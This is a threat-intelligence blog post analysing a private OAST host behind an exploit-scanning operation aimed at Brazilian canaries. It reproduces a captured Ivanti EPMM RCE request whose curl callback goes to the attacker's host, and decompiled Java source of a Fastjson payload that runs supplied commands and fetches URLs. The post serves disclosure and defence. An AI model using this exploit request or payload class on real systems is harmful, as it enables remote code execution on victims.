Sign In
Go back

The Mystery OAST Host Behind a Regionally Focused Exploit Operation

avatar
Jacob Baines@Junior_Baines
canarycvekev

Key Takeaways

VulnCheck Canary Intelligence observed a long-running, attacker-operated OAST service on Google Cloud driving a focused exploit operation.
The actor mixes stock Nuclei templates with custom payloads to broaden their reach.
All observed activity targeted canaries deployed in Brazil, suggesting a deliberate regional focus.

Background

Out-of-band application security testing (OAST) endpoints are widely used in internet-wide exploit scanning, and most actors rely on public services like oast.fun because they require no infrastructure. That is why callbacks to detectors-testing.com in VulnCheck’s Canary Intelligence traffic stood out. An attacker appeared to be running a private OAST domain and using it in a regionally focused exploit operation.

We observed roughly 1,400 exploit attempts spanning more than 200 CVEs linked to this infrastructure. While most of the activity resembled standard Nuclei templates, the attacker’s hosting choices, payloads, and regional targeting did not align with typical OAST use.

An Unfamiliar OAST

OAST makes it easy for attackers to verify command execution, SSRF, deserialization, and other classes of vulnerabilities. Commodity scanners like Nuclei typically use public services for this purpose, and their callbacks usually look like:

  • <random>.oast.pro
  • <random>.oast.me
  • <random>.interact.sh

So when VulnCheck’s canaries began observing OAST callbacks to subdomains of i-sh.detectors-testing.com, a domain we had never seen before, the pattern stood out. This is not a known OAST provider or anything referenced by popular scanning frameworks.

For example, the entry below from our Canary Intelligence data shows an exploit attempt for CVE-2025-4428 (Ivanti EPMM). If the exploit were successful, the compromised host would issue an HTTP request to d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com, one of the attacker’s OAST subdomains:

{
  "src_ip": "34.172.194.72",
  "src_port": 32902,
  "src_country": "US",
  "dst_country": "BR",
  "cve": "CVE-2025-4428",
  "signature_id": 12700562,
  "signature": "VULNCHECK Ivanti Endpoint Manager Mobile CVE-2025-4428 Exploit Attempt (RCE)",
  "category": "Web Application Attack",
  "severity": 1,
  "payload": "R0VUIC9hcGkvdjIvZmVhdHVyZXVzYWdlP2FkbWluRGV2aWNlU3BhY2VJZD0xMzEmZm9ybWF0PSUyNCU3YicnLmdldENsYXNzKCkuZm9yTmFtZSgnamF2YS5sYW5nLlJ1bnRpbWUnKS5nZXRNZXRob2QoJ2dldFJ1bnRpbWUnKS5pbnZva2UoJycuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZhLmxhbmcuUnVudGltZScpKS5leGVjKCdjdXJsJTIwZDRicXNkNmU0N21vNDdkOTNscGdxNTVkM2oxMTF5NmVtLmktc2guZGV0ZWN0b3JzLXRlc3RpbmcuY29tJyklN2QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV8zKSBBcHBsZVdlYktpdC82MDUuMS4xNSAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vOS4xLjIgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiBKU0VTU0lPTklEPTNFMTlEREE0ODY4MjEyQzM4RTQxRkIzQjdFMDc5QzdEDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K",
  "http": {
    "url": "/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com')%7d",
    "http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15",
    "protocol": "HTTP/1.1"
  },
  "timestamp": "2025-11-18T15:59:29.982Z"
}

Over time, we saw more than 200 unique CVE exploitation attempts associated with this infrastructure. Most of what we observed were standard Nuclei templates. However, some of the templates were no longer part of the current Nuclei library.

For example, the attacker used the old grafana-file-read.yaml template, which was removed from nuclei-templates in early October 2025. The template still appears in some third-party Nuclei-based scanners, such as dddd, so the presence of this older version could indicate that they are using one of these tools or that they simply have not updated their Nuclei installation.

Additionally, between October 12, 2025 and November 14, 2025, we observed more than 1,400 exploit attempts, targeting the canaries we had deployed in Brazil. We operate canaries across the globe, so the regional concentration stood out. AbuseIPDB reports show the same attacker IP addresses also being flagged in Serbia and Turkey, but in our dataset the activity was focused entirely on Brazil.

The regional nature of the attacks is notable, and so is their origin. Every source we observed came from US-based Google Cloud infrastructure.

Using Google Cloud gives the attacker practical benefits. Defenders are unlikely to block a major US cloud provider, and traffic headed toward Google networks blends easily with ordinary background communication.

This does not seem to be new behavior. urlquery has reported OAST callbacks involving i-sh.detectors-testing.com at 34.136.22.26 dating back to at least November 2024, which suggests this host has been part of someone’s scanning infrastructure for quite some time. A year-long OAST presence is rare; most opportunistic scanners churn infrastructure rapidly. CloudSEK has also mentioned detectors-testing.com in a broader writeup on Androxgh0st activity, although their attribution is weak. In our own telemetry, the same 34.136.22.26 address consistently presents Interactsh services across ports 80, 443, and 389, reinforcing that this system is being operated as a dedicated OAST endpoint. Our IP Intelligence entry for 34.136.22.26 looks like the following:

[
  {
    "ip": "34.136.22.26",
    "port": 389,
    "ssl": false,
    "lastSeen": "2025-11-25T05:13:48.086894",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:44:44.891435404Z"
  },
  {
    "ip": "34.136.22.26",
    "port": 443,
    "ssl": true,
    "lastSeen": "2025-11-22T22:18:34.906307",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:45:23.971299688Z"
  },
  {
    "ip": "34.136.22.26",
    "port": 25,
    "ssl": false,
    "lastSeen": "2025-11-22T22:06:42.440830",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:44:13.709554907Z"
  }
]

Although i-sh.detectors-testing.com behaves like a standard OAST endpoint, it also exposes additional material that gives more insight into the actor’s tooling. In particular, an open directory on port 9000 hosts a Java class file associated with Fastjson 1.2.47 exploitation (not tied to a specific CVE, but we are working to resolve that).

The file, TouchFile.class, is documented in Vulhub’s Fastjson 1.2.47 exploitation example, but the Vulhub version is short and only touches a file. This attacker’s implementation keeps the same default behavior (touch /tmp/success3125) but extends it. If no parameters are provided, it runs the default command. If cmd parameters are present, it executes those commands instead, and if http parameters are present, it makes outbound HTTP requests to those URLs.

A trimmed version of the decompiled class looks like this:

public class TouchFile {
  static {
    try {
      String defaultCmd = "touch /tmp/success3125";
      List < String > cmds = new ArrayList < > ();
      List < String > urls = new ArrayList < > ();

      URL codebase = TouchFile.class.getProtectionDomain()
        .getCodeSource()
        .getLocation();
      if (codebase != null) {
        String s = codebase.toString();
        int idx = s.indexOf("?");
        if (idx != -1 && idx < s.length() - 1) {
          Map < String, List < String >> params = new HashMap < > ();
          String query = s.substring(idx + 1);
          for (String part: query.split("&")) {
            String[] kv = part.split("=", 2);
            if (kv.length == 2) {
              params.computeIfAbsent(kv[0], k -> new ArrayList < > ())
                .add(URLDecoder.decode(kv[1], "UTF-8"));
            }
          }
          if (params.containsKey("cmd")) {
            cmds.addAll(params.get("cmd"));
          }
          if (params.containsKey("http")) {
            urls.addAll(params.get("http"));
          }
        }
      }

      if (cmds.isEmpty()) {
        cmds.add(defaultCmd);
      }

      for (String cmd: cmds) {
        Process p = Runtime.getRuntime().exec(cmd.split(" "));
        p.waitFor();
      }

      for (String u: urls) {
        HttpURLConnection c = (HttpURLConnection) new URL(u).openConnection();
        c.setRequestMethod("GET");
        c.getResponseCode();
      }
    } catch (Exception e) {
      e.printStackTrace(System.err);
    }
  }
}

The behavior of TouchFile.class illustrates how the attacker adapts publicly available tooling to their needs. It is a small detail, but it shows that the actor is willing to modify common exploit components rather than rely on them exactly as published.

Conclusion

Taken together, the use of a private OAST host, a mix of outdated and current Nuclei templates, and a custom Fastjson payload indicates an operation with more structure than typical exploit spraying. The long-lived OAST infrastructure and the consistent regional focus suggest an actor that is running a sustained scanning effort rather than short-lived opportunistic probes.

Regardless of attribution, this activity highlights a broader trend. Attackers continue to take off-the-shelf tooling like Nuclei and spray exploits across the internet to quickly identify and compromise vulnerable assets. They show little concern for the indicators or compromised accounts these tools leave behind, as long as the approach helps them find targets efficiently. The only way to protect yourself from such attackers is to monitor your network, understand what is exposed, and outpace adversaries.

About VulnCheck

VulnCheck’s research team tracks attacker infrastructure and exploit activity using our Canary Intelligence and IP Intelligence datasets. Investigations like this one into attacker-run OAST services and structured scanning workflows are part of our ongoing effort to highlight real-world exploitation trends. For more research like this check out our blogs, XWiki Under Increased Attack and ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611).

Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.

Ready to get Started?

Explore VulnCheck, a next-generation Cyber Threat Intelligence platform, which provides exploit and vulnerability intelligence to help you prioritize and remediate vulnerabilities that matter.
  • Vulnerability Prioritization
    Prioritize vulnerabilities that matter based on the threat landscape and defer vulnerabilities that don't.
  • Early Warning System
    Real-time alerting of changes in the vulnerability landscape so that you can take action before the attacks start.
Schedule a Demo